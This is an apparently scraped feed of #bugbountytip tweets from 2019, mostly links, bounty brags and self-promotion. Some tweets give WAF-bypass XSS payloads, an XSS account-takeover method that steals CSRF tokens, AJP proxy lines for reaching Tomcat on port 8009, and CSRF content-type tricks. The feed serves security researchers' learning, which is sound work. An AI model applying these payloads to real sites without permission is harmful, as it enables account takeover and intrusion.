@AboutHacking


2019-11-09 20:55:07
0 Cross Site Scripting Attack Series [ Baisc to Advance] Read: https://t.co/xZTIBcHlHr #cybersecurity #bugbounty #bugbountytip #bugbountytips #hacking https://t.co/QCQPhiYPtu
Murdockz
@Murdockz_CEH


2019-11-09 20:45:45
1 Remember this picture and date it was posted. When I share that I was rewarded XXXXX amount for a bug...you now know why. Step back learn and work hard to hit harder. ๐Ÿ˜Ž #bugbountytips #bugbountytip #StayHumble https://t.co/69lsVZNGPt
Paulos Yibelo
@PaulosYibelo


2019-11-09 18:04:05
1 I started seeing posts about escalating bugs for maximum impact. This is an article I wrote about how to escalate XSS for maximum gain back in Feb 2018: https://t.co/W7sZLunr6N #BugBounty #BugBountyTip #BoomerAdvice
Avi
@avileox


2019-11-09 03:28:43
2 Small Python library that makes it easy to exploit race conditions in web apps with Requests https://t.co/bkBGTn8SNu #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-09 00:11:43
0 Less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Ismayil Tahmazov
@Tismayil1


2019-11-08 23:16:27
2 I Earned $XXXX OS Command Injection Private Program. Used Repos 1 : Dir Searcher : https://t.co/1L6MutcaEc 2 : Sub Scanner : https://t.co/ZRcZb6ovUa #BugBounty #bugbountytips #bugbountytip #whitehat https://t.co/OPOc6mVkTc
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-11-08 21:34:35
7 -Hacking for Beginners.pdf: https://t.co/aQoLE86OKL -HTB: CTF.pdf: https://t.co/PCbL2YSGZR -HTB_ Hackback.pdf: https://t.co/Jz1m0qlU2a -Keep Calm and Hack The Box - Devel.pdf: https://t.co/Jz1m0qlU2a #bugbountytips #Hacking #redteam #Pentesting #infosec #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-08 13:20:02
0 Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Brute Logic
@brutelogic


2019-11-07 23:37:34
1 Great stuff here, check this out! #bugbountytip #IDOR #BOLA https://t.co/2q0MbSeOie
Arif Khan
@payloadartist


2019-11-07 21:25:23
2 LiveTargetsFinder - tool to automate #bugbounty recon. #bugbountytip https://t.co/aP0oQC0qdr
Nick || hunt4p1zza
@ngkogkos


2019-11-07 17:47:02
0 Agree with Jason here, it is a good #bugbountytip but need to be cautious. I would only set up an AutoRepeater/Burp rule for true/false, if I was highly familiar with my test user's data and the website's behavior. #bugbounty https://t.co/iMVChw8zkX
Karna
@karna__1


2019-11-07 15:41:35
0 Burned out? Bored? Need a really cool time-pass? I dare you to enter https://t.co/sJMORd6dlX All the @PortSwiggerRes content are ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ Soo much to learn. Just go bring your geek-self out! #research #infosec #bugbountytip #bugbountytips #hackers #hacking #geeks
warbid
@id_warb


2019-11-07 14:41:19
0 Use PDO they said PDO will save you from SQL injections they said #bugbountytip https://t.co/NUtccgqMR7
intigriti
@intigriti


2019-11-07 13:04:04
18 Looking for business logic flaws ๐Ÿ‘€? Flows with multiple steps are a good place to start. Try to skip steps or execute them in a wrong order and see what happens ๐Ÿ˜ˆ Thanks for the #BugBountyTip, @InsiderPhD! https://t.co/bw6Z28K6fE
bugbountytip
@a_l_e_r_t_1_


2019-11-07 06:51:34
0 Now, recon tools are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
darkmage
@therealdarkmage


2019-11-06 22:22:45
0 Got a $50 Amazon giftcard for reporting an #XSS to a company with no #bugbounty program. #bugbountytip: If you find a bug on a website/app that does not appear to have an active program, take heart and have courage and faith! Report it and see if they can compensate you๐Ÿค˜#infosec https://t.co/2Kql2FconG
Vinothkumar
@vinothpkumar


2019-11-06 16:57:18
0 Wrote a blog on "Publicly Exposed AWS SNS Topics" #bugbounty #Bugbountytip #aws #security https://t.co/wfNbUHHpjT
Pavandeep
@Pavandep8


2019-11-06 16:12:14
2 Look what I shared: When I found iframe injection and illegal redirect (dom based) @MIUI| #Hacker #privacy #Bugbountytip #security https://t.co/TnU1JRjUDm
intigriti
@intigriti


2019-11-06 15:34:54
12 Sometimes, TRUE is all you need โœ…. Use @Burp_Suite's match and replace to enable new functionalities in the UI and expand your attack surface! Thanks for the #BugBountyTip, @anshuman_bh! https://t.co/D55uMIl6Sx
Aditya Soni
@hetroublemakr


2019-11-06 14:43:08
0 Still any confusion about CVE2019 14287 Go and watch this video #infosec #Bugbountytip https://t.co/i4Mye3n7qO
Jinone
@jinonehk


2019-11-06 04:38:05
4 My first bounty blog post Get the full content of the private project internal network via ssrf https://t.co/MhKS2w6L0Z Thanks @Hacker0x01 #TogetherWeHitHarder #BugBounty #bugbountytip
Arif Khan
@payloadartist


2019-11-05 19:42:20
2 Very creative way to Abuse (cross-site authenticated) HEAD Requests leading to GitHub Oauth Bypass by @not_aardvark https://t.co/dX0lF2LVJ4 #bugbounty #bugbountytip
Abay
@abaykandotcom


2019-11-05 18:59:39
0 Actually these 2 findings are invalid. However, the interesting part is where and how the XSS payload is triggered~ #ripenglish #XSS #bugbountytip #bugbounties #bugbounty https://t.co/idpR2U41zn
YogoshaOfficial
@YogoshaOfficial


2019-11-05 16:10:19
5 [#Bugbountytip] Tomcat is used, yet, port 8080 filtered? use port 8009 which is forgotten โ€œoftenโ€. It uses AJP instead of HTTP so you your local apache as local proxy to convert traffic from HTTP to AJP. ProxyPass / ajp://target-ip:8009/ ProxyPassReverse / ajp://target-ip:8009/
Felix Kybranz
@_cybrg


2019-11-05 12:53:54
0 Got to many results from google dorks? Remove uninteresting buzzwords with: "-" site:http://paypal. com -demo -Capital Why did I miss that for so long!? Finding that was a nice wtf-moment๐Ÿ˜‡ #BugBounty #bugbountytips #bugbountytip #bugbounties
m0z
@LooseSecurity


2019-11-05 12:05:14
6 #BugBounty #bugbountytip #XSS Have an XSS and want to get account takeover but document.cookie isn't working? Try a payload which grabs the CSRF token, and then sends a request to the change email endpoint to change it to your email! Now your bug is twice as valuable. ;)
bugbountytip
@a_l_e_r_t_1_


2019-11-05 07:39:35
0 Reflected XSS on Magento #BugBountyTip #BugBountyTips https://t.co/KQSpPV2Q0m via @YouTube
Anshuman Pattnaik
@anspattnaik


2019-11-05 00:29:38
0 #bugbountytip #Google I got a strange thing to know that if google user gives certain access to a third party application then as per google policy guidelines that third application has complete ownership of the user's private information such Gmail, Drive and other services.
(((Gamliel)))
@Gamliel_InfoSec


2019-11-05 00:19:18
0 If u are pentesting/bug hunting in some web app that uses JSON and it runs on IIS, don't forget to test "JSON Parameter Pollution". Under some conditions u can poisoning some parameters, break Javascript context and voilรก ... #XSS #hack2learn #GivingBack2Community #BugBountyTip https://t.co/MjN3o8pVgH
m0z
@LooseSecurity


2019-11-04 22:46:32
3 Here's a useful #XSS payload with doesn't suffix "prompt" with any parenthesis! Object.defineProperty(window, 'p', { get: prompt });p; By using a Getter, we invoke the prompt without any input! Ideal for bypassing WAF! #BugBounty #bugbountytips #bugbountytip #bugbounties
bugbountytip
@a_l_e_r_t_1_


2019-11-04 21:22:01
0 Now, recon tools are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Ashish Kunwar
@D0rkerDevil


2019-11-04 15:32:18
1 Found Java_rmi service on port 8001 , used nmap "rmi dumregistery" script to dump the class path Found some goodies .. #bugbounty #bugbountytips #bugbountytip #security
KNOXSS
@knoxss_me


2019-11-04 13:46:16
1 One of #KNOXSS exclusive features! #XSS #bugbountytip https://t.co/SDP6thBcrz
Ashish Kunwar
@D0rkerDevil


2019-11-04 12:21:16
1 #bugbountytip look out for port 2181 - zookeeper , check if you are able to commands , as there is no auth in place by default in zookeeper installations. #bountytip #bugbountytips #protips #bugbounty #security
Leonel Emiliano
@leoalgare


2019-11-04 12:09:59
0 POST request with json body with no csrf token but also no CORS ? Always test change the content-type to urlencoded... It works like a charm. #bugbountytips #bugbountytip #hackerone #CSRF #Hacker0x01
Milind Purswani
@MilindPurswani


2019-11-03 17:38:13
0 Had a pyserver running on my VPS for days. Shodan scanned it and saved the response lol. Is this how "karma" works? #bugbountytip
VT10 Loading ๐ŸฅŠ๐ŸฅŠ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ
@SHIVAPURI12


2019-11-03 17:10:49
1 #MegaStar Lu oorike ayiporu,, aaaaah style,,,aaah energy ,, aaah Grace,, Ever green and Irreplaceable ,, #BossForAReason #MegaStatChiranjeevi Garu โค๏ธ๐Ÿ’“โค๏ธ at #bugbountytip finals,, #EmperorOfEntertainment #MegaStar #ChiruForEver Thanks to @StarMaa
Maulik Vaidh๐Ÿ‡ฎ๐Ÿ‡ณ @bsidesahmedabad
@Maulik1827


2019-11-03 15:46:18
0 @bsidesahmedabad 12 Days to go... Are you excited?๐Ÿ˜ƒ๐Ÿ˜ƒ #bsides #bsidesahmedabad #bugbountytip #infosec #hacking #security #conference #BugBounty https://t.co/EjmNa9ukkn
โœŽ /๐’…๐’†๐’—/๐’๐’–๐’๐’ ๐ŸŽƒ
@spyerror


2019-11-03 04:19:08
7 cloudflare {`XSSยด} ยซbyPASSยป payloads. @spyerror๐ŸŽฏ ๐Ÿฅ‡ $cat /<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> ๐Ÿฅˆ $cat /<svg%0Aonauxclick=0;[1].some(confirm)// #BugBounty #BugBountyTip #WAF #infosec
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:11:49
0 Bug Reported to Author. 8K+ Active sales. Script after redirect worked admin account then stored to fortend area. #bugbounty #bugbountytips #bugbountytip https://t.co/6N1XwtnN28
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:10:10
0 CodeCanyon Most Popular Item. Found : CSRF -> Stored XSS. 1 - HTML form auto submit to : admin/knowledge_base/article 2 - Payload direct worked after redirect. 3 - Admin area and Fronted area payload stored. 2/1 #bugbounty #bugbountytips #bugbountytip https://t.co/RiUgDz9GHq
Arif Khan
@payloadartist


2019-11-02 18:55:25
1 Good read: Smuggling HTTP requests over fake WebSocket connection by @0ang3el https://t.co/x1CxQyCq7u #bugbounty #bugbountytip
Arif Khan
@payloadartist


2019-11-02 16:21:33
2 Nice write up by @nj_dav on Abusing HTTP hop-by-hop Request Headers https://t.co/cEB4iFqnOGโ€ฆ #bugbounty #bugbountytip
Fisher
@Regala_


2019-11-02 14:28:40
2 Making the most out of live hacking events 101: ๐Ÿ“š Focus on learning ๐Ÿ‘ฅ Meet, connect and collaborate ๐Ÿ’ฏ Give your absolute best always ๐Ÿฅณ Have fun and enjoy #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-02 14:27:54
1 Now, Jenkins and Jira vulns are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Arif Khan
@payloadartist


2019-11-02 13:26:40
6 Nice write up by @daveysec on Abusing HTTP hop-by-hop Request Headers https://t.co/3VwrseBOta #bugbounty #bugbountytip
Andri Wahyudi ๐Ÿ“‚
@andripwn


2019-11-02 09:41:01
0 Remote Code Executions (RCE) - Bypassing Extension .png Private_Programs on @Hacker0x01 sad this duplicate :'( #bugbounty #bugbountytip #rce https://t.co/oMPTakOseD
Nikhil Mahajan
@mahajan344


2019-11-02 09:01:49
1 Thanks @detectify for another payout. #bugbountytip : If you have a vulnerability and that can be validated on the fly, try to automate that bug with #detectify scanner. With the help of automation, you don't have to worry about target :) #bugbounty #automation #ItTakesACrowd https://t.co/LjTNwXk5Ol
bugbountytip
@a_l_e_r_t_1_


2019-11-01 17:32:16
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-01 09:20:33
1 #SWAG ๐Ÿ†๐Ÿ† Symantec ๐Ÿ†๐Ÿ†๐Ÿ’ฐ๐Ÿ’ฐ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/EQfIvhpHD0
Ismayil Tahmazov
@Tismayil1


2019-11-01 07:25:06
0 Yes I Awarded $XXX. @instra Thanks For Bounty. #bugbounty #bugbountytip #bugbountytips
dark_warlord14
@dark_warlord14


2019-10-31 16:25:28
0 One must read blog post for beginners like me. Hats off to the author. #bugbountytips #bugbountytip https://t.co/ZtjGcCmSIz
Arif Khan
@payloadartist


2019-10-31 16:04:44
1 Wanted to add more juice to your #bugbounty recon? Grab this while its hot!!! Pricing is down to $10 from $50. Bonus - if u use my referral code, c5df8625, both of us get 500 credits more!!! #bugbountytip #halloween2019 https://t.co/WWbHqqLSHo
sagar yadav
@sagaryadav8742


2019-10-31 13:01:27
0 Happy to secure @readmeio ๐Ÿ˜ Soon I will get a nice #swag from https://t.co/zcDAQyTUV0 Program link :- https://t.co/eRXN5RdYW0 #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 https://t.co/NrtLkkroHi
sagar yadav
@sagaryadav8742


2019-10-31 12:52:27
0 @zerocopter swag ๐Ÿ˜ Happy to #secure #zerocopter #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/RSdeOn5Kjb
Hussein Daher
@HusseiN98D


2019-10-31 11:01:04
0 Please RT and add your suggestions #bugbounty #infosec #bugbountytip #bugbountytips
Max
@0xw2w


2019-10-31 09:52:20
0 Found a changing session cookie, that applying to the userโ€™s session during login to the account? Try logout CSRF + cookie setting (using XSS/CRLF inj/etc) to takeover a session when the user entered login and password again #bugbountytip #bugbounty #infosec
jub0bs
@jub0bs


2019-10-31 07:38:46
0 #bugbountytip Go deep on recon; go broad on targets.
Samet ลžAHฤฐN
@sametsahinnet


2019-10-31 05:44:47
0 Here a Google dork for finding ports ; inurl:"https://t.co/q4DIBVJDSJ" #BugBountytip #bugbounty #bugbountytips #Hacking #TogetherWeHitHarder https://t.co/UWdzDXZyhf
(((Gamliel)))
@Gamliel_InfoSec


2019-10-31 04:00:38
0 Added to Fav and waiting to test in a new project. #infosec #hacking #bugbountytip #pentesting #oneliner https://t.co/M5HhlBC8uI
Akshansh Jaiswal
@Akshanshjaiswl


2019-10-31 01:22:25
0 Yay, I was awarded a $1,000 bounty on @Hacker0x01! Account takeover->Make victim login to attacker's account->Make victim account unable to login to his orignal account. https://t.co/JKjOn6nSaA #TogetherWeHitHarder #bugbounty #bugbountytip https://t.co/26tKODyKX4
Shaked Klein Orbach ๐Ÿ‡ฎ๐Ÿ‡ฑ
@shakedko


2019-10-30 23:10:37
0 Many times I end up finding a test.php with "SIze: 0". I tend to assume that it's there for something, so most likely I will have to guess some parameters. I tried parameth but it didn't work well. Other ideas? #BugBounty #BugBountyTip CC @joohoi - using ffuf
Mohamed R Serwah
@serWazito0


2019-10-30 22:58:55
0 ๐Ÿ˜… any idea to get privilege escalation after login to ftp using anonymous username ?? #bugbountytip
Ismayil Tahmazov
@Tismayil1


2019-10-30 22:23:15
0 New Fast Subdomain Scanner My First GO experience. Your feedback is important to me. Hopefully it benefits your business. https://t.co/2o2pfa8Pi1 #bugbounty #bugbountytip #bugbountytips https://t.co/HHgGwcRfJ9
bugbountytip
@a_l_e_r_t_1_


2019-10-30 17:57:48
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
m0z
@LooseSecurity


2019-10-30 17:41:20
4 A lot of Self XSS is actually just POST XSS. Check if it has a CSRF token! Use your CSRF bypassing techniques to convert it. I've done this before, turned a useless self xss into a $1,000 vulnerability! Stored self XSS? Try a login CSRF chain! #BugBounty #bugbountytip
Dhamu
@Dham